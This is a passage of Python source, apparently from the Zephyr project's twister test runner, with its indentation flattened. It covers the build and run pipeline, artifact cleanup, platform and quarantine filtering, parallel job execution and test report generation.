# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
results.skipped_runtime += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
inst = res.get("instance", None)
if inst and inst.status == "skipped":
results.skipped_runtime += 1
if res.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "gather_metrics", "test": self.instance})
elif op == "gather_metrics":
self.gather_metrics(self.instance)
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.suite = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.status == "error":
results.error += 1
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
results.passed += 1
for res in instance.results.values():
if res == 'SKIP':
results.skipped_cases += 1
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done + results.skipped_filter, total_tests_width, total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
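# Non-verbose mode: overwrite a single progress line on stdout instead of logging every test.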
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done + results.skipped_filter) / total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done + results.skipped_filter,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if results.skipped_configs > 0 else Fore.RESET,
results.skipped_filter + results.skipped_runtime,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
def gather_metrics(self, instance):
if self.suite.enable_size_report and not self.suite.cmake_only:
self.calc_one_elf_size(instance)
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testcase-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"modules": {"type": "list", "default": []},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "release",
"twister_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
self.retry_build_errors = False
self.suite_name_check = True
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.quarantine = {}
self.platforms = []
self.platform_names = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
# used during creating shorter build paths
self.link_dir_counter = 0
self.pipeline = None
self.version = "NA"
self.modules = []
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12", "--always"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None):
for instance in self.instances.values():
results.cases += len(instance.testcase.cases)
if instance.status == 'skipped':
results.skipped_filter += 1
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{results.total - run - results.skipped_configs}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed, platform_reports, json_report, report_skipped):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version, report_skipped=report_skipped)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version, report_skipped=report_skipped)
self.csv_report(filename + ".csv")
if json_report:
self.json_report(filename + ".json", append=only_failed, version=self.version)
if platform_reports:
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
self.platform_names = [p.name for p in self.platforms]
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/modules/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError(f"E: {result['returnmsg']}")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.modules = tc_dict["modules"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
return len(self.testcases)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
Load the quarantine list from the given yaml file and create a dictionary
of all test configurations (platform + scenario: comment) that shall be
skipped due to quarantine.
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = self.platform_names
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
def load_from_file(self, file, filter_status=[], filter_platform=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testcases[test], platform, self.outdir)
if "run_id" in row and row["run_id"] != "na":
instance.run_id = row["run_id"]
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
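# Work out the platform selection mode implied by the command-line filters.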
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
self.verify_platforms_existence(platform_filter, "platform_filter")
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
if tc.build_on_all and not platform_filter:
platform_scope = self.platforms
elif tc.integration_platforms and self.integration:
self.verify_platforms_existence(
tc.integration_platforms, f"{tc_name} - integration_platforms")
platform_scope = list(filter(lambda item: item.name in tc.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and tc.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if tc.platform_allow and not platform_filter and not integration:
self.verify_platforms_existence(
tc.platform_allow, f"{tc_name} - platform_allow")
a = set(platform_scope)
b = set(filter(lambda item: item.name in tc.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in tc.platform_allow, \
self.platforms))
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if tc.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if tc.modules and self.modules:
if not set(tc.modules).issubset(set(self.modules)):
discards[instance] = discards.get(instance, f"one or more required module not available: {','.join(tc.modules)}")
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and "host" not in plat.supported_toolchains \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testcase.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
# run only quarantined test to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all and not integration:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in tc.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: inst.platform.simulation == 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
remove_from_discards = [] # configurations to be removed from discards.
for instance in self.discards:
instance.reason = self.discards[instance]
# If integration mode is on all skips on integration_platforms are treated as errors.
if self.integration and instance.platform.name in instance.testcase.integration_platforms \
and "Quarantine" not in instance.reason:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
instance.fill_results_by_status()
self.instances[instance.name] = instance
# Such configuration has to be removed from discards to make sure it won't get skipped
remove_from_discards.append(instance)
else:
instance.status = "skipped"
instance.fill_results_by_status()
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
# Remove from discards configurations that must not be discarded (e.g. integration_platforms when --integration was used)
for instance in remove_from_discards:
del self.discards[instance]
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False, retry_build_errors=False):
for instance in self.instances.values():
if build_only:
instance.run = False
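# Instances that already passed or were skipped are never re-queued; build errors are re-queued only when retry_build_errors is set.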
no_retry_statuses = ['passed', 'skipped']
if not retry_build_errors:
no_retry_statuses.append("error")
if instance.status not in no_retry_statuses:
logger.debug(f"adding {instance.name}")
instance.status = None
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
pipeline.put({"op": "cmake", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
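# Worker body: drain tasks from the shared pipeline and hand each one to a ProjectBuilder until the queue is empty.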
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors,
suite_name_check=self.suite_name_check
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only,
retry_build_errors=self.retry_build_errors)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
return results
def discard_report(self, filename):
try:
if not self.discards:
raise TwisterRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False, report_skipped=True):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version, report_skipped=report_skipped)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA", report_skipped=True):
total = 0
fails = passes = errors = skips = 0
if platform:
selected = [platform]
logger.info(f"Writing target report for {platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
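# In append mode, merge results into the existing report instead of regenerating it from scratch.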
if os.path.exists(filename) and append:
tree = ET.parse(filename)
